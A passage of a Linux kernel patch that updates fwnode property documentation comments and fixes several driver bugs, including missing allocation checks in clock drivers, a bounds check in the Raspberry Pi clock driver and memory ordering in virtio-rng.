++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * @args->fwnode pointer.
+  *
+- * Returns: %0 on success
++ * Return: %0 on success
+  *	    %-ENOENT when the index is out of bounds, the index has an empty
+  *		     reference or the property was not found
+  *	    %-EINVAL on parse error
+@@ -539,8 +543,11 @@ EXPORT_SYMBOL_GPL(fwnode_property_get_reference_args);
+  *
+  * @index can be used when the named reference holds a table of references.
+  *
+- * Returns pointer to the reference fwnode, or ERR_PTR. Caller is responsible to
+- * call fwnode_handle_put() on the returned fwnode pointer.
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
++ *
++ * Return: a pointer to the reference fwnode, when found. Otherwise,
++ * returns an error pointer.
+  */
+ struct fwnode_handle *fwnode_find_reference(const struct fwnode_handle *fwnode,
+ 					    const char *name,
+@@ -559,7 +566,7 @@ EXPORT_SYMBOL_GPL(fwnode_find_reference);
+  * fwnode_get_name - Return the name of a node
+  * @fwnode: The firmware node
+  *
+- * Returns a pointer to the node name.
++ * Return: a pointer to the node name, or %NULL.
+  */
+ const char *fwnode_get_name(const struct fwnode_handle *fwnode)
+ {
+@@ -571,7 +578,7 @@ EXPORT_SYMBOL_GPL(fwnode_get_name);
+  * fwnode_get_name_prefix - Return the prefix of node for printing purposes
+  * @fwnode: The firmware node
+  *
+- * Returns the prefix of a node, intended to be printed right before the node.
++ * Return: the prefix of a node, intended to be printed right before the node.
+  * The prefix works also as a separator between the nodes.
+  */
+ const char *fwnode_get_name_prefix(const struct fwnode_handle *fwnode)
+@@ -583,7 +590,10 @@ const char *fwnode_get_name_prefix(const struct fwnode_handle *fwnode)
+  * fwnode_get_parent - Return parent firwmare node
+  * @fwnode: Firmware whose parent is retrieved
+  *
+- * Return parent firmware node of the given node if possible or %NULL if no
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
++ *
++ * Return: parent firmware node of the given node if possible or %NULL if no
+  * parent was available.
+  */
+ struct fwnode_handle *fwnode_get_parent(const struct fwnode_handle *fwnode)
+@@ -600,8 +610,12 @@ EXPORT_SYMBOL_GPL(fwnode_get_parent);
+  * on the passed node, making it suitable for iterating through a
+  * node's parents.
+  *
+- * Returns a node pointer with refcount incremented, use
+- * fwnode_handle_node() on it when done.
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer. Note that this function also puts a reference to @fwnode
++ * unconditionally.
++ *
++ * Return: parent firmware node of the given node if possible or %NULL if no
++ * parent was available.
+  */
+ struct fwnode_handle *fwnode_get_next_parent(struct fwnode_handle *fwnode)
+ {
+@@ -621,8 +635,10 @@ EXPORT_SYMBOL_GPL(fwnode_get_next_parent);
+  * firmware node that has a corresponding struct device and returns that struct
+  * device.
+  *
+- * The caller of this function is expected to call put_device() on the returned
+- * device when they are done.
++ * The caller is responsible for calling put_device() on the returned device
++ * pointer.
++ *
++ * Return: a pointer to the device of the @fwnode's closest ancestor.
+  */
+ struct device *fwnode_get_next_parent_dev(struct fwnode_handle *fwnode)
+ {
+@@ -643,7 +659,7 @@ struct device *fwnode_get_next_parent_dev(struct fwnode_handle *fwnode)
+  * fwnode_count_parents - Return the number of parents a node has
+  * @fwnode: The node the parents of which are to be counted
+  *
+- * Returns the number of parents a node has.
++ * Return: the number of parents a node has.
+  */
+ unsigned int fwnode_count_parents(const struct fwnode_handle *fwnode)
+ {
+@@ -662,12 +678,12 @@ EXPORT_SYMBOL_GPL(fwnode_count_parents);
+  * @fwnode: The node the parent of which is requested
+  * @depth: Distance of the parent from the node
+  *
+- * Returns the nth parent of a node. If there is no parent at the requested
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
++ *
++ * Return: the nth parent of a node. If there is no parent at the requested
+  * @depth, %NULL is returned. If @depth is 0, the functionality is equivalent to
+  * fwnode_handle_get(). For @depth == 1, it is fwnode_get_parent() and so on.
+- *
+- * The caller is responsible for calling fwnode_handle_put() for the returned
+- * node.
+  */
+ struct fwnode_handle *fwnode_get_nth_parent(struct fwnode_handle *fwnode,
+ 					    unsigned int depth)
+@@ -692,7 +708,7 @@ EXPORT_SYMBOL_GPL(fwnode_get_nth_parent);
+  *
+  * A node is considered an ancestor of itself too.
+  *
+- * Returns true if @ancestor is an ancestor of @child. Otherwise, returns false.
++ * Return: true if @ancestor is an ancestor of @child. Otherwise, returns false.
+  */
+ bool fwnode_is_ancestor_of(struct fwnode_handle *ancestor, struct fwnode_handle *child)
+ {
+@@ -717,6 +733,10 @@ bool fwnode_is_ancestor_of(struct fwnode_handle *ancestor, struct fwnode_handle
+  * fwnode_get_next_child_node - Return the next child node handle for a node
+  * @fwnode: Firmware node to find the next child node for.
+  * @child: Handle to one of the node's child nodes or a %NULL handle.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer. Note that this function also puts a reference to @child
++ * unconditionally.
+  */
+ struct fwnode_handle *
+ fwnode_get_next_child_node(const struct fwnode_handle *fwnode,
+@@ -727,10 +747,13 @@ fwnode_get_next_child_node(const struct fwnode_handle *fwnode,
+ EXPORT_SYMBOL_GPL(fwnode_get_next_child_node);
+ 
+ /**
+- * fwnode_get_next_available_child_node - Return the next
+- * available child node handle for a node
++ * fwnode_get_next_available_child_node - Return the next available child node handle for a node
+  * @fwnode: Firmware node to find the next child node for.
+  * @child: Handle to one of the node's child nodes or a %NULL handle.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer. Note that this function also puts a reference to @child
++ * unconditionally.
+  */
+ struct fwnode_handle *
+ fwnode_get_next_available_child_node(const struct fwnode_handle *fwnode,
+@@ -754,7 +777,11 @@ EXPORT_SYMBOL_GPL(fwnode_get_next_available_child_node);
+ /**
+  * device_get_next_child_node - Return the next child node handle for a device
+  * @dev: Device to find the next child node for.
+- * @child: Handle to one of the device's child nodes or a null handle.
++ * @child: Handle to one of the device's child nodes or a %NULL handle.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer. Note that this function also puts a reference to @child
++ * unconditionally.
+  */
+ struct fwnode_handle *device_get_next_child_node(struct device *dev,
+ 						 struct fwnode_handle *child)
+@@ -779,6 +806,9 @@ EXPORT_SYMBOL_GPL(device_get_next_child_node);
+  * fwnode_get_named_child_node - Return first matching named child node handle
+  * @fwnode: Firmware node to find the named child node for.
+  * @childname: String to match child node name against.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
+  */
+ struct fwnode_handle *
+ fwnode_get_named_child_node(const struct fwnode_handle *fwnode,
+@@ -792,6 +822,9 @@ EXPORT_SYMBOL_GPL(fwnode_get_named_child_node);
+  * device_get_named_child_node - Return first matching named child node handle
+  * @dev: Device to find the named child node for.
+  * @childname: String to match child node name against.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
+  */
+ struct fwnode_handle *device_get_named_child_node(struct device *dev,
+ 						  const char *childname)
+@@ -804,7 +837,10 @@ EXPORT_SYMBOL_GPL(device_get_named_child_node);
+  * fwnode_handle_get - Obtain a reference to a device node
+  * @fwnode: Pointer to the device node to obtain the reference to.
+  *
+- * Returns the fwnode handle.
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
++ *
++ * Return: the fwnode handle.
+  */
+ struct fwnode_handle *fwnode_handle_get(struct fwnode_handle *fwnode)
+ {
+@@ -833,6 +869,8 @@ EXPORT_SYMBOL_GPL(fwnode_handle_put);
+  * fwnode_device_is_available - check if a device is available for use
+  * @fwnode: Pointer to the fwnode of the device.
+  *
++ * Return: true if device is available for use. Otherwise, returns false.
++ *
+  * For fwnode node types that don't implement the .device_is_available()
+  * operation, this function returns true.
+  */
+@@ -851,6 +889,8 @@ EXPORT_SYMBOL_GPL(fwnode_device_is_available);
+ /**
+  * device_get_child_node_count - return the number of child nodes for device
+  * @dev: Device to cound the child nodes for
++ *
++ * Return: the number of child nodes for a given device.
+  */
+ unsigned int device_get_child_node_count(struct device *dev)
+ {
+@@ -926,7 +966,7 @@ EXPORT_SYMBOL_GPL(device_get_phy_mode);
+  * @fwnode:	Pointer to the firmware node
+  * @index:	Index of the IO range
+  *
+- * Returns a pointer to the mapped memory.
++ * Return: a pointer to the mapped memory.
+  */
+ void __iomem *fwnode_iomap(struct fwnode_handle *fwnode, int index)
+ {
+@@ -939,12 +979,18 @@ EXPORT_SYMBOL(fwnode_iomap);
+  * @fwnode:	Pointer to the firmware node
+  * @index:	Zero-based index of the IRQ
+  *
+- * Returns Linux IRQ number on success. Other values are determined
+- * accordingly to acpi_/of_ irq_get() operation.
++ * Return: Linux IRQ number on success. Negative errno on failure.
+  */
+ int fwnode_irq_get(const struct fwnode_handle *fwnode, unsigned int index)
+ {
+-	return fwnode_call_int_op(fwnode, irq_get, index);
++	int ret;
++
++	ret = fwnode_call_int_op(fwnode, irq_get, index);
++	/* We treat mapping errors as invalid case */
++	if (ret == 0)
++		return -EINVAL;
++
++	return ret;
+ }
+ EXPORT_SYMBOL(fwnode_irq_get);
+ 
+@@ -959,8 +1005,7 @@ EXPORT_SYMBOL(fwnode_irq_get);
+  * number of the IRQ resource corresponding to the index of the matched
+  * string.
+  *
+- * Return:
+- * Linux IRQ number on success, or negative errno otherwise.
++ * Return: Linux IRQ number on success, or negative errno otherwise.
+  */
+ int fwnode_irq_get_byname(const struct fwnode_handle *fwnode, const char *name)
+ {
+@@ -982,7 +1027,11 @@ EXPORT_SYMBOL(fwnode_irq_get_byname);
+  * @fwnode: Pointer to the parent firmware node
+  * @prev: Previous endpoint node or %NULL to get the first
+  *
+- * Returns an endpoint firmware node pointer or %NULL if no more endpoints
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer. Note that this function also puts a reference to @prev
++ * unconditionally.
++ *
++ * Return: an endpoint firmware node pointer or %NULL if no more endpoints
+  * are available.
+  */
+ struct fwnode_handle *
+@@ -1022,6 +1071,9 @@ EXPORT_SYMBOL_GPL(fwnode_graph_get_next_endpoint);
+  * fwnode_graph_get_port_parent - Return the device fwnode of a port endpoint
+  * @endpoint: Endpoint firmware node of the port
+  *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
++ *
+  * Return: the firmware node of the device the @endpoint belongs to.
+  */
+ struct fwnode_handle *
+@@ -1043,6 +1095,9 @@ EXPORT_SYMBOL_GPL(fwnode_graph_get_port_parent);
+  * @fwnode: Endpoint firmware node pointing to the remote endpoint
+  *
+  * Extracts firmware node of a remote device the @fwnode points to.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
+  */
+ struct fwnode_handle *
+ fwnode_graph_get_remote_port_parent(const struct fwnode_handle *fwnode)
+@@ -1063,6 +1118,9 @@ EXPORT_SYMBOL_GPL(fwnode_graph_get_remote_port_parent);
+  * @fwnode: Endpoint firmware node pointing to the remote endpoint
+  *
+  * Extracts firmware node of a remote port the @fwnode points to.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
+  */
+ struct fwnode_handle *
+ fwnode_graph_get_remote_port(const struct fwnode_handle *fwnode)
+@@ -1076,6 +1134,9 @@ EXPORT_SYMBOL_GPL(fwnode_graph_get_remote_port);
+  * @fwnode: Endpoint firmware node pointing to the remote endpoint
+  *
+  * Extracts firmware node of a remote endpoint the @fwnode points to.
++ *
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
+  */
+ struct fwnode_handle *
+ fwnode_graph_get_remote_endpoint(const struct fwnode_handle *fwnode)
+@@ -1103,8 +1164,11 @@ static bool fwnode_graph_remote_available(struct fwnode_handle *ep)
+  * @endpoint: identifier of the endpoint node under the port node
+  * @flags: fwnode lookup flags
+  *
+- * Return the fwnode handle of the local endpoint corresponding the port and
+- * endpoint IDs or NULL if not found.
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
++ *
++ * Return: the fwnode handle of the local endpoint corresponding the port and
++ * endpoint IDs or %NULL if not found.
+  *
+  * If FWNODE_GRAPH_ENDPOINT_NEXT is passed in @flags and the specified endpoint
+  * has not been found, look for the closest endpoint ID greater than the
+@@ -1112,9 +1176,6 @@ static bool fwnode_graph_remote_available(struct fwnode_handle *ep)
+  *
+  * Does not return endpoints that belong to disabled devices or endpoints that
+  * are unconnected, unless FWNODE_GRAPH_DEVICE_DISABLED is passed in @flags.
+- *
+- * The returned endpoint needs to be released by calling fwnode_handle_put() on
+- * it when it is not needed any more.
+  */
+ struct fwnode_handle *
+ fwnode_graph_get_endpoint_by_id(const struct fwnode_handle *fwnode,
+@@ -1320,7 +1381,8 @@ EXPORT_SYMBOL_GPL(fwnode_connection_find_match);
+  * @fwnode and other device nodes. @match will be used to convert the
+  * connection description to data the caller is expecting to be returned
+  * through the @matches array.
+- * If @matches is NULL @matches_len is ignored and the total number of resolved
++ *
++ * If @matches is %NULL @matches_len is ignored and the total number of resolved
+  * matches is returned.
+  *
+  * Return: Number of matches resolved, or negative errno.
+diff --git a/drivers/bus/fsl-mc/dprc-driver.c b/drivers/bus/fsl-mc/dprc-driver.c
+index 5e70f9775a0e3..d1e2d2987dd38 100644
+--- a/drivers/bus/fsl-mc/dprc-driver.c
++++ b/drivers/bus/fsl-mc/dprc-driver.c
+@@ -46,6 +46,9 @@ static int __fsl_mc_device_remove_if_not_in_mc(struct device *dev, void *data)
+ 	struct fsl_mc_child_objs *objs;
+ 	struct fsl_mc_device *mc_dev;
+ 
++	if (!dev_is_fsl_mc(dev))
++		return 0;
++
+ 	mc_dev = to_fsl_mc_device(dev);
+ 	objs = data;
+ 
+@@ -65,6 +68,9 @@ static int __fsl_mc_device_remove_if_not_in_mc(struct device *dev, void *data)
+ 
+ static int __fsl_mc_device_remove(struct device *dev, void *data)
+ {
++	if (!dev_is_fsl_mc(dev))
++		return 0;
++
+ 	fsl_mc_device_remove(to_fsl_mc_device(dev));
+ 	return 0;
+ }
+diff --git a/drivers/bus/ti-sysc.c b/drivers/bus/ti-sysc.c
+index 9a7d12332fadb..cae078bffc715 100644
+--- a/drivers/bus/ti-sysc.c
++++ b/drivers/bus/ti-sysc.c
+@@ -1808,7 +1808,7 @@ static u32 sysc_quirk_dispc(struct sysc *ddata, int dispc_offset,
+ 	if (!ddata->module_va)
+ 		return -EIO;
+ 
+-	/* DISP_CONTROL */
++	/* DISP_CONTROL, shut down lcd and digit on disable if enabled */
+ 	val = sysc_read(ddata, dispc_offset + 0x40);
+ 	lcd_en = val & lcd_en_mask;
+ 	digit_en = val & digit_en_mask;
+@@ -1820,7 +1820,7 @@ static u32 sysc_quirk_dispc(struct sysc *ddata, int dispc_offset,
+ 		else
+ 			irq_mask |= BIT(2) | BIT(3);	/* EVSYNC bits */
+ 	}
+-	if (disable & (lcd_en | digit_en))
++	if (disable && (lcd_en || digit_en))
+ 		sysc_write(ddata, dispc_offset + 0x40,
+ 			   val & ~(lcd_en_mask | digit_en_mask));
+ 
+diff --git a/drivers/char/hw_random/st-rng.c b/drivers/char/hw_random/st-rng.c
+index 15ba1e6fae4d2..6e9dfac9fc9f4 100644
+--- a/drivers/char/hw_random/st-rng.c
++++ b/drivers/char/hw_random/st-rng.c
+@@ -42,7 +42,6 @@
+ 
+ struct st_rng_data {
+ 	void __iomem	*base;
+-	struct clk	*clk;
+ 	struct hwrng	ops;
+ };
+ 
+@@ -85,26 +84,18 @@ static int st_rng_probe(struct platform_device *pdev)
+ 	if (IS_ERR(base))
+ 		return PTR_ERR(base);
+ 
+-	clk = devm_clk_get(&pdev->dev, NULL);
++	clk = devm_clk_get_enabled(&pdev->dev, NULL);
+ 	if (IS_ERR(clk))
+ 		return PTR_ERR(clk);
+ 
+-	ret = clk_prepare_enable(clk);
+-	if (ret)
+-		return ret;
+-
+ 	ddata->ops.priv	= (unsigned long)ddata;
+ 	ddata->ops.read	= st_rng_read;
+ 	ddata->ops.name	= pdev->name;
+ 	ddata->base	= base;
+-	ddata->clk	= clk;
+-
+-	dev_set_drvdata(&pdev->dev, ddata);
+ 
+ 	ret = devm_hwrng_register(&pdev->dev, &ddata->ops);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "Failed to register HW RNG\n");
+-		clk_disable_unprepare(clk);
+ 		return ret;
+ 	}
+ 
+@@ -113,15 +104,6 @@ static int st_rng_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int st_rng_remove(struct platform_device *pdev)
+-{
+-	struct st_rng_data *ddata = dev_get_drvdata(&pdev->dev);
+-
+-	clk_disable_unprepare(ddata->clk);
+-
+-	return 0;
+-}
+-
+ static const struct of_device_id st_rng_match[] __maybe_unused = {
+ 	{ .compatible = "st,rng" },
+ 	{},
+@@ -134,7 +116,6 @@ static struct platform_driver st_rng_driver = {
+ 		.of_match_table = of_match_ptr(st_rng_match),
+ 	},
+ 	.probe = st_rng_probe,
+-	.remove = st_rng_remove
+ };
+ 
+ module_platform_driver(st_rng_driver);
+diff --git a/drivers/char/hw_random/virtio-rng.c b/drivers/char/hw_random/virtio-rng.c
+index a6f3a8a2aca6d..35304117338ab 100644
+--- a/drivers/char/hw_random/virtio-rng.c
++++ b/drivers/char/hw_random/virtio-rng.c
+@@ -4,6 +4,7 @@
+  *  Copyright (C) 2007, 2008 Rusty Russell IBM Corporation
+  */
+ 
++#include <asm/barrier.h>
+ #include <linux/err.h>
+ #include <linux/hw_random.h>
+ #include <linux/scatterlist.h>
+@@ -37,13 +38,13 @@ struct virtrng_info {
+ static void random_recv_done(struct virtqueue *vq)
+ {
+ 	struct virtrng_info *vi = vq->vdev->priv;
++	unsigned int len;
+ 
+ 	/* We can get spurious callbacks, e.g. shared IRQs + virtio_pci. */
+-	if (!virtqueue_get_buf(vi->vq, &vi->data_avail))
++	if (!virtqueue_get_buf(vi->vq, &len))
+ 		return;
+ 
+-	vi->data_idx = 0;
+-
++	smp_store_release(&vi->data_avail, len);
+ 	complete(&vi->have_data);
+ }
+ 
+@@ -52,7 +53,6 @@ static void request_entropy(struct virtrng_info *vi)
+ 	struct scatterlist sg;
+ 
+ 	reinit_completion(&vi->have_data);
+-	vi->data_avail = 0;
+ 	vi->data_idx = 0;
+ 
+ 	sg_init_one(&sg, vi->data, sizeof(vi->data));
+@@ -88,7 +88,7 @@ static int virtio_read(struct hwrng *rng, void *buf, size_t size, bool wait)
+ 	read = 0;
+ 
+ 	/* copy available data */
+-	if (vi->data_avail) {
++	if (smp_load_acquire(&vi->data_avail)) {
+ 		chunk = copy_data(vi, buf, size);
+ 		size -= chunk;
+ 		read += chunk;
+diff --git a/drivers/clk/bcm/clk-raspberrypi.c b/drivers/clk/bcm/clk-raspberrypi.c
+index 679f4649a7efd..278f845572813 100644
+--- a/drivers/clk/bcm/clk-raspberrypi.c
++++ b/drivers/clk/bcm/clk-raspberrypi.c
+@@ -375,9 +375,9 @@ static int raspberrypi_discover_clocks(struct raspberrypi_clk *rpi,
+ 	while (clks->id) {
+ 		struct raspberrypi_clk_variant *variant;
+ 
+-		if (clks->id > RPI_FIRMWARE_NUM_CLK_ID) {
++		if (clks->id >= RPI_FIRMWARE_NUM_CLK_ID) {
+ 			dev_err(rpi->dev, "Unknown clock id: %u (max: %u)\n",
+-					   clks->id, RPI_FIRMWARE_NUM_CLK_ID);
++					   clks->id, RPI_FIRMWARE_NUM_CLK_ID - 1);
+ 			return -EINVAL;
+ 		}
+ 
+diff --git a/drivers/clk/clk-cdce925.c b/drivers/clk/clk-cdce925.c
+index ef9a2d44e40c3..d88e1d681a2ce 100644
+--- a/drivers/clk/clk-cdce925.c
++++ b/drivers/clk/clk-cdce925.c
+@@ -714,6 +714,10 @@ static int cdce925_probe(struct i2c_client *client)
+ 	for (i = 0; i < data->chip_info->num_plls; ++i) {
+ 		pll_clk_name[i] = kasprintf(GFP_KERNEL, "%pOFn.pll%d",
+ 			client->dev.of_node, i);
++		if (!pll_clk_name[i]) {
++			err = -ENOMEM;
++			goto error;
++		}
+ 		init.name = pll_clk_name[i];
+ 		data->pll[i].chip = data;
+ 		data->pll[i].hw.init = &init;
+@@ -755,6 +759,10 @@ static int cdce925_probe(struct i2c_client *client)
+ 	init.num_parents = 1;
+ 	init.parent_names = &parent_name; /* Mux Y1 to input */
+ 	init.name = kasprintf(GFP_KERNEL, "%pOFn.Y1", client->dev.of_node);
++	if (!init.name) {
++		err = -ENOMEM;
++		goto error;
++	}
+ 	data->clk[0].chip = data;
+ 	data->clk[0].hw.init = &init;
+ 	data->clk[0].index = 0;
+@@ -773,6 +781,10 @@ static int cdce925_probe(struct i2c_client *client)
+ 	for (i = 1; i < data->chip_info->num_outputs; ++i) {
+ 		init.name = kasprintf(GFP_KERNEL, "%pOFn.Y%d",
+ 			client->dev.of_node, i+1);
++		if (!init.name) {
++			err = -ENOMEM;
++			goto error;
++		}
+ 		data->clk[i].chip = data;
+ 		data->clk[i].hw.init = &init;
+ 		data->clk[i].index = i;
+diff --git a/drivers/clk/clk-renesas-pcie.c b/drivers/clk/clk-renesas-pcie.c
+index 3e98a16eba6bb..35b2519f16961 100644
+--- a/drivers/clk/clk-renesas-pcie.c
++++ b/drivers/clk/clk-renesas-pcie.c
+@@ -353,7 +353,7 @@ static const struct rs9_chip_info renesas_9fgv0241_info = {
+ };
+ 
+ static const struct i2c_device_id rs9_id[] = {
+-	{ "9fgv0241", .driver_data = RENESAS_9FGV0241 },
++	{ "9fgv0241", .driver_data = (kernel_ulong_t)&renesas_9fgv0241_info },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(i2c, rs9_id);
+diff --git a/drivers/clk/clk-si5341.c b/drivers/clk/clk-si5341.c
+index 0e528d7ba656e..c7d8cbd22bacc 100644
+--- a/drivers/clk/clk-si5341.c
++++ b/drivers/clk/clk-si5341.c
+@@ -1553,7 +1553,7 @@ static int si5341_probe(struct i2c_client *client)
+ 	struct clk_init_data init;
+ 	struct clk *input;
+ 	const char *root_clock_name;
+-	const char *synth_clock_names[SI5341_NUM_SYNTH];
++	const char *synth_clock_names[SI5341_NUM_SYNTH] = { NULL };
+ 	int err;
+ 	unsigned int i;
+ 	struct clk_si5341_output_config config[SI5341_MAX_NUM_OUTPUTS];
+@@ -1697,6 +1697,10 @@ static int si5341_probe(struct i2c_client *client)
+ 	for (i = 0; i < data->num_synth; ++i) {
+ 		synth_clock_names[i] = devm_kasprintf(&client->dev, GFP_KERNEL,
+ 				"%s.N%u", client->dev.of_node->name, i);
++		if (!synth_clock_names[i]) {
++			err = -ENOMEM;
++			goto free_clk_names;
++		}
+ 		init.name = synth_clock_names[i];
+ 		data->synth[i].index = i;
+ 		data->synth[i].data = data;
+@@ -1705,6 +1709,7 @@ static int si5341_probe(struct i2c_client *client)
+ 		if (err) {
+ 			dev_err(&client->dev,
+ 				"synth N%u registration failed\n", i);
++			goto free_clk_names;
+ 		}
+ 	}
+ 
+@@ -1714,6 +1719,10 @@ static int si5341_probe(struct i2c_client *client)
+ 	for (i = 0; i < data->num_outputs; ++i) {
+ 		init.name = kasprintf(GFP_KERNEL, "%s.%d",
+ 			client->dev.of_node->name, i);
++		if (!init.name) {
++			err = -ENOMEM;
++			goto free_clk_names;
++		}
+ 		init.flags = config[i].synth_master ? CLK_SET_RATE_PARENT : 0;
+ 		data->clk[i].index = i;
+ 		data->clk[i].data = data;
+@@ -1735,7 +1744,7 @@ static int si5341_probe(struct i2c_client *client)
+ 		if (err) {
+ 			dev_err(&client->dev,
+ 				"output %u registration failed\n", i);
+-			goto cleanup;
++			goto free_clk_names;
+ 		}
+ 		if (config[i].always_on)
+ 			clk_prepare(data->clk[i].hw.clk);
+@@ -1745,7 +1754,7 @@ static int si5341_probe(struct i2c_client *client)
+ 			data);
+ 	if (err) {
+ 		dev_err(&client->dev, "unable to add clk provider\n");
+-		goto cleanup;
++		goto free_clk_names;
+ 	}
+ 
+ 	if (initialization_required) {
+@@ -1753,11 +1762,11 @@ static int si5341_probe(struct i2c_client *client)
+ 		regcache_cache_only(data->regmap, false);
+ 		err = regcache_sync(data->regmap);
+ 		if (err < 0)
+-			goto cleanup;
++			goto free_clk_names;
+ 
+ 		err = si5341_finalize_defaults(data);
+ 		if (err < 0)
+-			goto cleanup;
++			goto free_clk_names;
+ 	}
+ 
+ 	/* wait for device to report input clock present and PLL lock */
+@@ -1766,32 +1775,31 @@ static int si5341_probe(struct i2c_client *client)
+ 	       10000, 250000);
+ 	if (err) {
+ 		dev_err(&client->dev, "Error waiting for input clock or PLL lock\n");
+-		goto cleanup;
++		goto free_clk_names;
+ 	}
+ 
+ 	/* clear sticky alarm bits from initialization */
+ 	err = regmap_write(data->regmap, SI5341_STATUS_STICKY, 0);
+ 	if (err) {
+ 		dev_err(&client->dev, "unable to clear sticky status\n");
+-		goto cleanup;
++		goto free_clk_names;
+ 	}
+ 
+ 	err = sysfs_create_files(&client->dev.kobj, si5341_attributes);
+-	if (err) {
++	if (err)
+ 		dev_err(&client->dev, "unable to create sysfs files\n");
+-		goto cleanup;
+-	}
+ 
++free_clk_names:
+ 	/* Free the names, clk framework makes copies */
+ 	for (i = 0; i < data->num_synth; ++i)
+ 		 devm_kfree(&client->dev, (void *)synth_clock_names[i]);
+ 
+-	return 0;
+-
+ cleanup:
+-	for (i = 0; i < SI5341_MAX_NUM_OUTPUTS; ++i) {
+-		if (data->clk[i].vddo_reg)
+-			regulator_disable(data->clk[i].vddo_reg);
++	if (err) {
++		for (i = 0; i < SI5341_MAX_NUM_OUTPUTS; ++i) {
++			if (data->clk[i].vddo_reg)
++				regulator_disable(data->clk[i].vddo_reg);
++		}
+ 	}
+ 	return err;
+ }
+diff --git a/drivers/clk/clk-versaclock5.c b/drivers/clk/clk-versaclock5.c
+index 88689415aff9c..ef50ab78dd90d 100644
+--- a/drivers/clk/clk-versaclock5.c
++++ b/drivers/clk/clk-versaclock5.c
+@@ -450,10 +450,7 @@ static long vc5_pll_round_rate(struct clk_hw *hw, unsigned long rate,
+ 	u32 div_int;
+ 	u64 div_frc;
+ 
+-	if (rate < VC5_PLL_VCO_MIN)
+-		rate = VC5_PLL_VCO_MIN;
+-	if (rate > VC5_PLL_VCO_MAX)
+-		rate = VC5_PLL_VCO_MAX;
++	rate = clamp(rate, VC5_PLL_VCO_MIN, VC5_PLL_VCO_MAX);
+ 
+ 	/* Determine integer part, which is 12 bit wide */
+ 	div_int = rate / *parent_rate;
+@@ -1030,6 +1027,11 @@ static int vc5_probe(struct i2c_client *client)
+ 	}
+ 
+ 	init.name = kasprintf(GFP_KERNEL, "%pOFn.mux", client->dev.of_node);
++	if (!init.name) {
++		ret = -ENOMEM;
++		goto err_clk;
++	}
++
+ 	init.ops = &vc5_mux_ops;
+ 	init.flags = 0;
+ 	init.parent_names = parent_names;
+@@ -1044,6 +1046,10 @@ static int vc5_probe(struct i2c_client *client)
+ 		memset(&init, 0, sizeof(init));
+ 		init.name = kasprintf(GFP_KERNEL, "%pOFn.dbl",
+ 				      client->dev.of_node);
++		if (!init.name) {
++			ret = -ENOMEM;
++			goto err_clk;
++		}
+ 		init.ops = &vc5_dbl_ops;
+ 		init.flags = CLK_SET_RATE_PARENT;
+ 		init.parent_names = parent_names;
+@@ -1059,6 +1065,10 @@ static int vc5_probe(struct i2c_client *client)
+ 	/* Register PFD */
+ 	memset(&init, 0, sizeof(init));
+ 	init.name = kasprintf(GFP_KERNEL, "%pOFn.pfd", client->dev.of_node);
++	if (!init.name) {
++		ret = -ENOMEM;
++		goto err_clk;
++	}
+ 	init.ops = &vc5_pfd_ops;
+ 	init.flags = CLK_SET_RATE_PARENT;
+ 	init.parent_names = parent_names;
+@@ -1076,6 +1086,10 @@ static int vc5_probe(struct i2c_client *client)
+ 	/* Register PLL */
+ 	memset(&init, 0, sizeof(init));
+ 	init.name = kasprintf(GFP_KERNEL, "%pOFn.pll", client->dev.of_node);
++	if (!init.name) {
++		ret = -ENOMEM;
++		goto err_clk;
++	}
+ 	init.ops = &vc5_pll_ops;
+ 	init.flags = CLK_SET_RATE_PARENT;
+ 	init.parent_names = parent_names;
+@@ -1095,6 +1109,10 @@ static int vc5_probe(struct i2c_client *client)
+ 		memset(&init, 0, sizeof(init));
+ 		init.name = kasprintf(GFP_KERNEL, "%pOFn.fod%d",
+ 				      client->dev.of_node, idx);
++		if (!init.name) {
++			ret = -ENOMEM;
++			goto err_clk;
++		}
+ 		init.ops = &vc5_fod_ops;
+ 		init.flags = CLK_SET_RATE_PARENT;
+ 		init.parent_names = parent_names;
+@@ -1113,6 +1131,10 @@ static int vc5_probe(struct i2c_client *client)
+ 	memset(&init, 0, sizeof(init));
+ 	init.name = kasprintf(GFP_KERNEL, "%pOFn.out0_sel_i2cb",
+ 			      client->dev.of_node);
++	if (!init.name) {
++		ret = -ENOMEM;
++		goto err_clk;
++	}
+ 	init.ops = &vc5_clk_out_ops;
+ 	init.flags = CLK_SET_RATE_PARENT;
+ 	init.parent_names = parent_names;
+@@ -1139,6 +1161,10 @@ static int vc5_probe(struct i2c_client *client)
+ 		memset(&init, 0, sizeof(init));
+ 		init.name = kasprintf(GFP_KERNEL, "%pOFn.out%d",
+ 				      client->dev.of_node, idx + 1);
++		if (!init.name) {
++			ret = -ENOMEM;
++			goto err_clk;
++		}
+ 		init.ops = &vc5_clk_out_ops;
+ 		init.flags = CLK_SET_RATE_PARENT;
+ 		init.parent_names = parent_names;
+@@ -1258,13 +1284,13 @@ static const struct vc5_chip_info idt_5p49v6975_info = {
+ };
+ 
+ static const struct i2c_device_id vc5_id[] = {
+-	{ "5p49v5923", .driver_data = IDT_VC5_5P49V5923 },
+-	{ "5p49v5925", .driver_data = IDT_VC5_5P49V5925 },
+-	{ "5p49v5933", .driver_data = IDT_VC5_5P49V5933 },
